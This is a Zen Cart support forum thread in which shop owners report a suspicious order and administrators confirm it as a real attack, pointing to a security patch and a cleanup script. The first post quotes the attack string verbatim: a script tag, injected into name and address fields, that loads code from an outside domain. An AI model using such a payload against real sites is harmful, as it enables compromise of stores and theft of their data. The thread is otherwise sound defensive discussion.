We have had one instance in a recent customer order of this string appearing in the customer and shipping address name fields:
"<script src=//a6x.me/s/3˃˂/script˃". Searching the Web I can find only one other occurrence of this at
https://elitecollegepapers.blog/i-wa...other/03/2024/
It looks like that site may also be using Zencart.
The IPAddress of a6x.me is 172.67.135.15 and the IPAddress the order was made from is 149.28.252.158
Both addresses are blacklisted on seven servers listed at multirbl.valli.org.
Any idea if this is a real hacking attempt that could compromise a ZenCart database or just some twerp goofing around?
Would be grateful for advice.
Thread: Possible hacking attempt alert
Results 1 to 8 of 8
-
6 Apr 2024, 05:47 PM #1
New Zenner
- Join Date
- Jun 2016
- Location
- New York, NY
- Posts
- 81
- Plugin Contributions
- 0
Possible hacking attempt alert
-
6 Apr 2024, 06:05 PM #2
Administrator
- Join Date
- Sep 2009
- Location
- Stuart, FL
- Posts
- 12,501
- Plugin Contributions
- 88
Re: Possible hacking attempt alert
See this thread: https://www.zen-cart.com/showthread....-v1-5-8-series
It's a real hacking attempt.
-
6 Apr 2024, 06:16 PM #3
New Zenner
- Join Date
- Jun 2016
- Location
- New York, NY
- Posts
- 81
- Plugin Contributions
- 0
Re: Possible hacking attempt alert
@lat9 Thank you for the speedy response.
-
6 Apr 2024, 08:26 PM #4
New Zenner
- Join Date
- Jun 2016
- Location
- New York, NY
- Posts
- 81
- Plugin Contributions
- 0
Re: Possible hacking attempt alert
Installation of the security patch was simple - so thank you for this. Would be nice if the spam_cleanup_check script could also list the actual SPAM accounts, too.
-
8 Apr 2024, 08:08 AM #5
New Zenner
- Join Date
- Mar 2010
- Posts
- 52
- Plugin Contributions
- 0
Re: Possible hacking attempt alert
Hi Guys
I've followed the instructions on https://www.zen-cart.com/showthread....-v1-5-8-series.
But after I applied the SQL Patch. I run the spam_cleanup_check.php, it still shows "One or more SPAM accounts found, you should change all admin passwords and your admin directory name."
Is this normal?
Thanks
-
8 Apr 2024, 11:23 AM #6
Administrator
- Join Date
- Feb 2006
- Location
- Tampa Bay, Florida
- Posts
- 9,704
- Plugin Contributions
- 123
Re: Possible hacking attempt alert
Yes, it means your site was attacked. Go ahead and do what it says and install the updated database.php file patch and you'll be protected.
That Software Guy. My Store: Zen Cart Modifications
Available for hire - See my ad in Services
Plugin Moderator, Documentation Curator, Chief Cook and Bottle-Washer.
Do you benefit from Zen Cart? Then please support the project.
-
Re: Possible hacking attempt alert
You can do an admin search for "FAKE ACCOUNT" and clean up whatever you wish.
Originally Posted by SPython
.
Zen Cart - putting the dream of business ownership within reach of anyone!
Donate to: DrByte directly or to the Zen Cart team as a whole
Remember: Any code suggestions you see here are merely suggestions. You assume full responsibility for your use of any such suggestions, including any impact ANY alterations you make to your site may have on your PCI compliance.
Furthermore, any advice you see here about PCI matters is merely an opinion, and should not be relied upon as "official". Official PCI information should be obtained from the PCI Security Council directly or from one of their authorized Assessors.
-
9 Apr 2024, 08:23 PM #8
New Zenner
- Join Date
- May 2012
- Posts
- 3
- Plugin Contributions
- 0
Re: Possible hacking attempt alert
Does anyone know what they were able to "do" by putting that script tag value in the field? Did they steal information or what is the fallout? I applied the patch and changed url/passwords, so I guess I should now be protected, but I am curious what may have happened during the attack.
Reply With Quote
Bookmarks